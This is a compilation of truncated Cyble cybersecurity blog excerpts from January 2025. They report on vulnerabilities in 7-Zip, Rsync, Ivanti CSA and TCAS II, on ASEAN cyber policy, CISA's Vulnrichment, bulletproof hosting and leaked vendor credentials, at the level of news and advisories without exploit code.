An attacker could use the vulnerability to craft an archive file so that the files do not inherit the MOTW mark when they are extracted by 7-Zip. The vulnerability was just announced, but a patch has been available since November 30. As 7-Zip lacks an auto-update function, users must download the update directly.

CVE-2024-12084 is a 9.8-severity Heap-Based Buffer Overflow vulnerability in the Rsync file synchronization tool. The vulnerability arises from improper handling of checksum lengths that exceed the fixed limit of 16 bytes (SUM_LENGTH) during the processing of user-controlled data. An attacker could manipulate checksum lengths, leading to out-of-bounds memory writes in the sum2 buffer. This could enable remote code execution (RCE) on systems running the Rsync server. Cyble detected more than 276,000 vulnerable web-facing Rsync exposures (image below).

Dark Web Exploits and Zero Days

The

Source: https://cyble.com/blog/it-vulnerability-report-7-zip-windows-and-fortinet-fixes-urged-by-cyble/ (2025-01-27)

Cyble - CyberSecurity Firm: United Against Cybercrime: ASEAN Ministers Forge New Security Pathways

Overview

The digital world in Southeast Asia is evolving rapidly, with nations striving to balance innovation, inclusivity, and security. The recently held 5th ASEAN Digital Ministers' Meeting (ADGMIN) in Bangkok, Thailand, marked a significant milestone in this journey. The meeting highlighted the importance of cybersecurity in shaping a resilient digital future for the region. The ASEAN Digital Masterplan 2025 (ADM 2025) continues to serve as a guiding framework for fostering collaboration, enabling trust in digital services, and promoting the safe and inclusive use of technology.
From addressing online scams to operationalizing the ASEAN Regional Computer Emergency Response Team (CERT) and advancing AI governance, the event showcased ASEAN's commitment to fortifying its digital ecosystem against cyber threats. With an emphasis on collaboration and proactive measures, the meeting highlighted the pressing need to enhance cybersecurity frameworks, strengthen cross-border data governance, and address emerging challenges posed by technologies like generative AI.

Key Cybersecurity Highlights

ASEAN Regional CERT Operationalization: One of the significant milestones discussed was the operationalization of the ASEAN Regional Computer Emergency Response Team (CERT). This initiative aims to enhance collaboration among member states, facilitate real-time information sharing, and strengthen the region's preparedness against cyberattacks. CERT's operationalization highlights ASEAN's focus on collective resilience in cyberspace.

Tackling Online Scams: Online scams remain a pressing issue across ASEAN. The ASEAN Working Group on Anti-Online Scams (WG-AS) released its Report on Online Scams Activities in ASEAN (2023–2024), offering insights into the threat landscape. The report outlines key recommendations for regional collaboration to combat scams effectively. The ASEAN Recommendations on Anti-Online Scams provide a framework for governments to develop policies aimed at mitigating online fraud, with a focus on cross-border scams and fraudulent activities exploiting digital platforms.

Promoting Responsible State Behavior in Cyberspace: ASEAN adopted the Checklist for Responsible State Behavior in Cyberspace, aligning with global norms to promote peace and security online. This initiative focuses on fostering cooperation and ensuring responsible use of digital tools while mitigating risks.
Strengthening Cross-Border Data Governance: Data governance was another key topi

Source: https://cyble.com/blog/united-against-cybercrime-asean-ministers-forge-new-security-pathways/ (2025-01-27)

Cyble - CyberSecurity Firm: Unlocking Vulnrichment: Enhancing CVE Data for Smarter Vulnerability Management

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has introduced Vulnrichment, an innovative initiative designed to enhance CVE data by adding crucial context, scoring, and detailed analysis. Launched on May 10, 2024, Vulnrichment aims to empower security professionals by providing more than just basic CVE information: it offers the insights needed to make informed, timely decisions regarding vulnerability management.

As part of a mid-year update, CISA's Tod Beardsley, Vulnerability Response Section Chief, provides an overview of how this resource can be leveraged to improve vulnerability management.

For IT defenders and vulnerability management teams, Vulnrichment represents a significant advancement in how CVE data is presented and utilized. By enriching basic CVE records with essential metadata like Stakeholder-Specific Vulnerability Categorization (SSVC) decision points, Common Weakness Enumeration (CWE) IDs, and Common Vulnerability Scoring System (CVSS) scores, Vulnrichment transforms raw CVE data into a more actionable and comprehensive resource.

The best part? No additional setup is required. This enhanced data is integrated directly into the CVE feeds already being consumed by security teams. Whether you're pulling CVE data from the official CISA platform at https://cve.org or GitHub at https://github.com/CVEProject/cvelistV5, you're already collecting the enriched CVE records that Vulnrichment provides.
How Vulnrichment Enhances CVE Data

CISA's Vulnrichment is designed to provide a deeper layer of insight into each CVE, helping security professionals prioritize vulnerabilities with greater clarity. Here's an example of how Vulnrichment works with a specific CVE, CVE-2023-45727, which has been marked as a Known Exploited Vulnerability (KEV) by CISA. If you want to understand the exploitation status of this CVE, you can query the SSVC decision points included in the Vulnrichment ADP (Authorized Data Publisher) container. For instance, using the command line tool jq, you can execute a query to extract the "Exploitation" field to understand whether the vulnerability is actively being exploited, requires proof of concept, or is not yet exploited in the wild.

By parsing the ADP container, you can extract this enriched data, which helps you make informed decisions about whether to prioritize this vulnerability over others. This ability to access context-rich CVE data provides valuable intelligence for vulnerability management efforts, enabling teams to prioriti

Source: https://cyble.com/blog/cisa-reveals-vulnrichment-management-for-cve-data/ (2025-01-24)

Cyble - CyberSecurity Firm: Anatomy of an Exploit Chain: CISA, FBI Detail Ivanti CSA Attacks

Threat actors chained together four vulnerabilities in Ivanti Cloud Service Appliances (CSA) in confirmed attacks on multiple organizations in September, according to an advisory released this week by the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

The agencies urged users to upgrade to the latest supported version of Ivanti CSA, and to conduct threat hunting on networks using recommended detection techniques and Indicators of Compromise (IoCs).
The January 22 advisory builds on October 2024 advisories from CISA and Ivanti and offers new information on the ways threat actors can chain together vulnerabilities in an attack. The four vulnerabilities were exploited as zero days, leading some to suspect sophisticated nation-state threat actors, possibly linked to the People's Republic of China (PRC).

The Ivanti CSA Exploit Chains

CVE-2024-8963, a critical administrative bypass vulnerability, was used in both exploit chains, first in conjunction with the CVE-2024-8190 and CVE-2024-9380 remote code execution (RCE) vulnerabilities, and in the second chain with CVE-2024-9379, a SQL injection vulnerability.

The vulnerabilities were chained to gain initial access, conduct RCE attacks, obtain credentials, and implant web shells on victim networks. In one case, the threat actors (TAs) moved laterally to two servers.

The vulnerabilities affect Ivanti CSA 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below. However, Ivanti says the CVEs have not been exploited in version 5.0.
The First Exploit Chain

In the RCE attacks, the threat actors sent a GET request to datetime.php to obtain session and cross-site request forgery (CSRF) tokens, followed by a POST request to the same endpoint using the TIMEZONE input field to manipulate the setSystemTimeZone

Source: https://cyble.com/blog/ivanti-csa-attacks-cisa-fbi-expose-exploit-chain/ (2025-01-24)

Cyble - CyberSecurity Firm: Aircraft Collision Avoidance Systems Hit by High-Severity ICS Vulnerability

Overview

A pair of vulnerabilities in the Traffic Alert and Collision Avoidance System (TCAS) II for avoiding midair collisions were among 20 vulnerabilities reported by Cyble in its weekly Industrial Control System (ICS) Vulnerability Intelligence Report.

The midair collision system flaws have been judged at low risk of being exploited, but one of the vulnerabilities does not presently have a fix. They could potentially be exploited from adjacent networks.

Other ICS vulnerabilities covered in the January 15-21 Cyble report to subscribers include flaws in critical manufacturing, energy and other critical infrastructure systems. The full report is available for subscribers, but Cyble is publishing information on the TCAS vulnerabilities in the public interest.

TCAS II Vulnerabilities

The TCAS II vulnerabilities were reported to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) by European researchers and defense agencies. CISA in turn disclosed the vulnerabilities in a January 21 advisory.
The vulnerabilities are still undergoing analysis by NIST, but Cyble vulnerability researchers said the weaknesses “underscore the urgent need for enhanced input validation and secure configuration controls in transportation systems.”

TCAS airborne devices function independently of ground-based air traffic control (ATC) systems, according to the FAA, and provide collision avoidance protection for a range of aircraft types. TCAS II is a more advanced system for commercial aircraft with more than 30 seats or a maximum takeoff weight of more than 33,000 pounds. TCAS II offers advanced features such as recommended escape maneuvers for avoiding midair collisions.

The first vulnerability, CVE-2024-9310, is an “Untrusted Inputs” vulnerability in TCAS II that presently carries a CVSS 3.1 base score of 6.1.

CISA notes that “By utilizing software-defined radios and a custom low-latency processing pipeline, RF signals with spoofed location data can be transmitted to aircraft targets. This can lead to the appearance of fake aircraft on displays and potentially trigger undesired Resolution Advisories (RAs).”

The second flaw, CVE-2024-11166, is an 8.2-severity External Control of System or Configuration Setting vulnerability.
TCAS II systems using transponders compliant with MOPS earlier than RTCA DO-181F could be attacked by threat actors impersonating a ground station to issue a Comm-

Source: https://cyble.com/blog/aircraft-collision-ics-flaw-risks-mid-air-crashes/ (2025-01-23)

Cyble - CyberSecurity Firm: Australian Cyber Security Centre Targets Bulletproof Hosting Providers to Disrupt Cybercrime Networks

Overview

The Australian Cyber Security Centre (ACSC) has issued a detailed warning regarding Bulletproof Hosting Providers (BPH). These illicit infrastructure services play a critical role in supporting cybercrime, allowing malicious actors to conduct their operations while remaining largely undetectable. The Australian government's growing efforts to combat cybercrime highlight the increasing difficulty for cybercriminals to maintain secure, resilient, and hidden infrastructures.

BPH services are an integral part of the Cybercrime-as-a-Service (CaaS) ecosystem, which provides a range of tools and services enabling cybercriminals to carry out their attacks. From ransomware campaigns to data theft, cybercriminals rely on BPH providers to host illicit websites, deploy malware, and execute phishing scams. These hosting services help criminals stay out of the reach of law enforcement and avoid detection, making it harder to track down those behind cyberattacks.

The term "bulletproof" is somewhat misleading, as it is more of a marketing ploy than a reflection of the actual capabilities of these providers. Despite the branding, BPH providers remain vulnerable to disruption just like other infrastructure providers.
What sets them apart is their blatant disregard for legal requests to shut down services, as they refuse to comply with takedown orders or abuse complaints from victims or law enforcement. This allows cybercriminals to continue their activities with little fear of being interrupted or exposed.

How Bulletproof Hosting Providers Operate

BPH providers typically lease virtual or physical infrastructure to cybercriminals, offering them a platform to run their operations. These services often include leasing IP addresses and servers that obscure the true identities of their customers. Many BPH providers achieve this by utilizing complex network switching methods, making it difficult to trace activity back to its source. In some cases, these providers even lease IP addresses from legitimate data centers or Internet Service Providers (ISPs), many of whom may remain unaware that their infrastructure is being used for criminal purposes.

A key strategy employed by BPH providers is frequently changing the internet-facing identifiers associated with their customers. This could include altering IP addresses or domain names, further complicating efforts to track criminal activity. These techniques frustrate cybersecurity efforts and investigative agencies, hindering their ability to identify, apprehend, and disrupt criminal activity. Anot

Source: https://cyble.com/blog/acsc-highlights-bulletproof-hosting-providers/ (2025-01-22)

Cyble - CyberSecurity Firm: Cyble Finds Thousands of Security Vendor Credentials on Dark Web

Overview

Account credentials from some of the largest cybersecurity vendors can be found on the dark web, a result of the growing problem of infostealers, according to an analysis of Cyble threat intelligence data.
The credentials – available for as little as $10 in cybercrime marketplaces – span internal accounts and customer access across web and cloud environments, including internal security company enterprise and development environments that could pose substantial risks.

The accounts ideally would have been protected by multifactor authentication (MFA), which would have made any attack more difficult. However, the leaked credentials underscore the importance of dark web monitoring as an early warning system for keeping such leaks from becoming much bigger cyberattacks.

Leaked Security Company Credentials

Leaked credentials have an inherent time value – the older the credentials, the more likely the password has been changed – so Cyble researchers looked only at credentials leaked since the start of the year. Cyble looked at 13 of the largest enterprise security vendors, along with some of the bigger consumer security companies, and found credentials from all of them on the dark web. The credentials were likely pulled from infostealer logs and then sold in bulk on cybercrime marketplaces.

Most of the credentials appear to be customer credentials that protect access to sensitive management and account interfaces, but all the security vendors Cyble examined had access to internal systems leaked on the dark web, too. Security vendors had credentials leaked to potentially critical internal systems such as Okta, Jira, GitHub, AWS, Microsoft Online, Salesforce, SolarWinds, Box, WordPress, Oracle, and Zoom, plus several other password managers, authentication systems, and device management platforms.

Cyble did not attempt to determine whether any of the credentials were valid, but many were for easily accessible web console interfaces, SSO logins, and other web-facing account access points. The vendors Cyble looked at included a range of network and cloud security providers, including some of the biggest makers of SIEM systems, EDR tools, and firewalls.
All have had data exposures just since the start of the year that ideally were addressed quickly, or at least required additional authentication steps for access. One of the largest security vendors Cyble looked at may have more sensitive accounts exposed, as company email addresses are listed among the credentials for

Source: https://cyble.com/blog/thousands-of-security-vendor-credentials-found-on-dark-web/ (2025-01-22)